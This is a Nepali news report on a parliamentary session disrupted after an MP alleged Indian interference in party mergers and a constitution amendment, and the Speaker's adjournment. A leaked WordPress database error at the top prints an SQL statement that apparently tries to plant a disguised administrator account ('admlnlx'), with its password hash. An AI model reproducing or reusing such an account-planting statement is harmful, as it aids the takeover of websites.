WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BxzneE0cMSrE6br4bALoFAfSW8qUtM0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 16:45:35', '', 'admlnlx', 'admlnlx')
काठमाडौँ, मंसिर १९–
व्यवस्थापिका संसदको बैठकमा भारतले राप्रपालाई एकीकरण गराएको र एमाले बिभाजन गर्ने प्रयास भइरहेको भनिएपछि केहीबेर होहल्ला भएको छ ।
आइतवार संसद बैठक शुरु हुनासाथ प्रमुख विपक्षी एमाले लगायत अन्य साना बामपन्थी पार्टीका सांसदहरु उठेर बैठकमा अवरोध सिर्जना गरेका थिए ।
विपक्षी सांसदहरु उठेपछि सभामुख ओनसरी घर्ती मगरले नेपाल मजदुर किसान पार्टीकी सांसद अनुराधा थापा मगरलाई बोल्ने समय दिइन् ।
उनले संविधान संसोधन नेपाली जनताको माग नभई भारत सरकारको चाहना बमोजिम हुन लागेको भन्दै त्यसमा समर्थन जनाउन नसकिने बताइन् । उनले भारतले आफ्नो अनुकुल संविधान संसोधन गराउन दुई तिहाई बहुमत पुर्याइदिनकै लागि राप्रपा र राप्रपा नेपालको एकीकरण गराएको र एमाले फुटाउन समेत षड्यन्त्र गरिरहेको बताएकी थिइन् ।
सांसद थापा मगरले त्यसो भन्नासाथ राप्रपाका सांसदहरु उठेर आपत्ति जनाएका थिए । उनीहरुले त्यो भनाईर् संसदको रेकर्डबाट हटाउन सभामुखसँग माग गरेपछि केहीबेर होहल्ला भयो ।
सांसद थापा मगरले भारतीय दूतावासमा गएर भोज खाने मधेशी मोर्चाका नेताहरुले मधेशी जनताको नाममा भारत सरकारको सेवकको काम गरिरहेको आरोप लगाइन् ।
विदेशीको इशारामा ल्याएको संविधान संसोधन बिधेयक फिर्ता नभएसम्म संसद बैठक अघि बढ्न नदिने बताएपछि सभामुखले केहीबेर विपक्षी सांसदहरुलाई आसन ग्रहण गर्न आग्रह गरिन् ।
तर प्रमुख विपक्षी सहित विपक्षी दलका सांसदहरु आ आफ्नो आसनबाट उभिएर बसेको अवस्थामा संसदको कारवाही अघि बढ्न नसक्ने भन्दै सभामुखले मंसिर २२ गतेसम्मका लागि बैठक स्थगित गरेको संसद सचिवालयले जनाएको छ ।